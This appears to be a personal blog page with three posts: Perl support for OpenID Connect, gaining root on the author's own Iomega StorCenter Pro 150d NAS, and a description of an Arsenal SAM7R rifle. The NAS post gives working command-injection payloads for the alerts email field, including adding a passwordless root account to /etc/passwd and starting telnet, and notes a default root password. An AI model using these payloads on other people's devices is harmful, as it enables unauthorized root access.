Friday, November 29, 2013

OpenID Connect with Perl

Screenshot of Google consent screen
OpenID Connect is a new federated authentication and authorization protocol based on OAuth 2.0. The specification hasn't been finalized yet, but is expected soon.

Perl support is available through the OIDC::Lite module written by Ryo Ito. You can fetch it through CPAN or directly from Ryo's github repository.

The OIDC::Lite::Demo::Client package provides example code for a bunch of providers (as of this writing, there's support for Google, Facebook, Microsoft, Yahoo Japan, and the Japanese social networking site Mixi).

Monday, September 2, 2013

Hacking the Iomega StorCenter Pro 150d NAS

The StorCenter Pro 150d is a circa 2007 network-attached storage device (NAS) from Iomega which, frustratingly, does not provide shell access.

I had a problem with AFP (Apple Filing Protocol) not working but managed to get root access to fix it (turned out to be an orphaned pid file which wasn't being removed on boot, and which was preventing the service from starting).

The 150d has a vulnerability in how it handles email addresses within the alerts interface:

Screenshot of the StorCenter Pro 150d's Alerts Interface

You can append any arbitrary command between backticks and it will be dutifully executed as root when you click the "Send Test Mail" button.

It turns out that the StorCenter Pro 150d has a telnet daemon available through inetd. So all we need to do is start that, add a passwordless root account, and we can pop right in.,

Here are the commands that worked for me, but use them at your own risk. Click "Send Test Mail" after entering each one. The null@[] address is arbitrary -- any email address should work there.

UPDATE: See the comment from @George Kopf below. Apparently the default root password is simply the number '1', so you probably don't need to create the additional account. Just start the telnet daemon and try logging in as user 'root' with password '1'.

null@[]`mount -t devpts devpts /dev/pts >> /nethdd/public/hacknas.log 2>&1 &`

null@[]`nohup /bin/inetd /etc/inetd.conf >> /nethdd/public/hacknas.log 2>&1 &`

null@[]`echo 'root2::0:0:administrator:/mnt/0:/bin/sh' >>/etc/passwd`

If you have the /public share of your NAS mounted somewhere, you can watch the hacknas.log file to see any error messages.

Once done, you should be able to telnet in:

$ telnet nas
Connected to
Escape character is '^]'.

Linux 2.6.13 (obi) (pts/0)

nas login: root2

BusyBox v1.00 (BUILDTIME) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

-sh: can't access tty; job control turned off
~ #

System info:

# cat /proc/cpuinfo
processor : 0
cpu : e300
revision : 1.1 (pvr 8083 0011)
bogomips : 263.16
chipset : 8347E
Vendor : Freescale Inc.
Machine : mpc8347E sys
core clock : 396 MHz
bus  clock : 264 MHz
PVR : 0x80830011
SVR : 0x80520011
PLL setting : 0x6
Memory : 256 MB

For reference, here is the Iomega 150d manual.

Thanks to Jim Buzbee for identifying the alert vulnerability, and asysadm for his post on modifying the NFS export options.

Friday, March 15, 2013

Arsenal SAM7R Instruction Manual

The SAM7R-61 is a high quality Bulgarian-made AK47 rifle chambered in 7.62x39mm. It features a milled receiver and a chrome lined hammer-forged barrel.
Arsenal SAM7R-61
Arsenal SAM7R-61

  • 14mm muzzle threads
  • muzzle break
  • cleaning rod
  • bayonet lug
  • black polymer furniture
  • intermediate length buttstock
  • scope rail
  • one 10-round magazine
  • sling
  • oil bottle
  • cleaning kit

The SAM7R also comes in a California compliant model (the SAM7R-61C) that has a non-detachable magazine (you need to use their provided tool to release the mag).